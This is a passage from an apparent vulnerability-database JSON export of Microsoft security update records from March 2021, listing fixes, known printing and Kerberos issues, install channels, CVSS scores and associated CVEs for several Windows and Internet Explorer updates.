11.0.9600.19963| 12-Feb-2021| 18:46| 47,616 \nieUnatt.exe| 11.0.9600.19963| 
12-Feb-2021| 18:37| 115,712 \n \n### **Windows Server 2008**\n\nInternet Explorer 9 on all supported x86-based versions\n\nInternet Explorer 9 on all supported x64-based versions\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## References\n\nLearn about the 
[terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "KB5000800: Cumulative security update for Internet Explorer: March 9, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000800", "href": "https://support.microsoft.com/en-us/help/5000800", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:31:20", "description": "None\n**12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). 
To view other notes and messages, see the Windows 10, version 1803 update history home page.\n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, the Windows Kernel, the Microsoft Graphics Component, Windows Graphics, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001565. \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. 
Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001634. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4580398) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000809>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000809](<https://download.microsoft.com/download/9/0/d/90d4abf0-4129-404c-be46-5a1798eab386/5000809.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000809 (OS Build 17134.2087)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000809", "href": "https://support.microsoft.com/en-us/help/5000809", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:31:21", "description": "None\n**2/16/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). 
Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.1817) released March 9, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. 
Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to the Windows Shell, Windows Fundamentals, Windows Management, Windows Apps, Windows User Account Control (UAC), Windows Core Networking, Windows Hybrid Cloud Networking, the Windows Kernel, Windows Virtualization, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note** If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC** recovery option.\n 3. 
Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, you might receive an APC_INDEX_MISMATCH error with a blue screen when attempting to print to certain printers in some apps.| This issue is resolved in KB5001568. \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001638. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5000859) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. 
\nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000822>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5000822](<https://download.microsoft.com/download/f/2/f/f2fc2870-838b-4900-aaa6-4e1168d79b43/5000822.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000822 (OS Build 17763.1817)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000822", "href": "https://support.microsoft.com/en-us/help/5000822", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:31:24", "description": 
"None\n**Important: ** \n \nWindows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n**Important: ****March 9, 2021** \nAs part of the end of support for Adobe Flash, [KB4577586](<https://support.microsoft.com/help/4577586>) is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586[ ](<https://support.microsoft.com/help/4577586>). For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601384](<https://support.microsoft.com/help/4601384>) (released February 9, 2021) and addresses the following issues:\n\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. 
This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerformTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, Windows Media, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001640. \n \n## How to get this update\n\n### Before installing this update\n\nWe strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. 
This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000848>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro. **Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for update 5000848](<https://download.microsoft.com/download/0/0/3/0036604e-4a48-4a7e-a819-1a9c3657f829/5000848.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000848 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": 
"KB5000848", "href": "https://support.microsoft.com/en-us/help/5000848", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:31:22", "description": "None\n**Important:** Verify that you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**Important:** For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601360](<https://support.microsoft.com/help/4601360>) (released February 9, 2021) and addresses the following issues: \n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerformTicketSignature** to **1** or larger. 
Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, and Windows Hybrid Cloud Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001642. \n \n## How to get this update\n\n### Before installing this update\n\n**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n\n### **Prerequisite**\n\nYou must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). 
This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. 
\nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000844>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows Server 2008 Service Pack 2. **Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5000844](<https://download.microsoft.com/download/b/4/c/b4ca9728-4c2d-46fd-b3b9-769235c4305a/5000844.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000844 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000844", "href": "https://support.microsoft.com/en-us/help/5000844", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2023-06-23T19:31:20", "description": "None\n**NEW 3/9/21** \n**IMPORTANT** As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates security for the Windows user interface.\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using Microsoft Office products.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Turns off token binding by default in Windows Internet (WinINet).\n * Addresses an issue in the Windows Management Instrumentation (WMI) service that causes a heap leak each time security settings are applied to WMI namespace permissions.\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerformTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. 
Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online. \n * Addresses a reliability issue in Remote Desktop.\n * Addresses an issue that might cause stop error 7E in **nfssvr.sys** on servers running the Network File System (NFS) service.\n * Addresses an issue that excessively logs DfsSvc Event 14554 in the System event log by default once every hour for each DFS Namespace (DFSN). This update adds a new registry key, RootShareAcquireSuccessEvent, to enable or disable Event 14554.Keypath: HKEY_LOCAL_MACHINE/L\"System\\CurrentControlSet\\Services\\Dfs\\Parameters\"Default value = 0If RootShareAcquireSuccessEvent is not 0 or is not present = Enable log.If RootShareAcquireSuccessEvent is 0 = Disable log.Whenever you change RootShareAcquireSuccessEvent, you must restart the DFSN service.\n * Addresses an issue that causes an increase in network traffic during update detection for Windows Updates. 
This issue occurs on devices that are configured to use an authenticated user proxy as the fallback method if update detection with a system proxy fails or there is no proxy.\n * Security updates to the Windows Shell, Windows User Account Control (UAC), Windows Fundamentals, Windows Core Networking, Windows Hybrid Cloud Networking, Windows Kernel, Windows Virtualization, the Microsoft Graphics Component, Internet Explorer, Microsoft Edge Legacy, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released March 9, 2021 or March 15, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001633. 
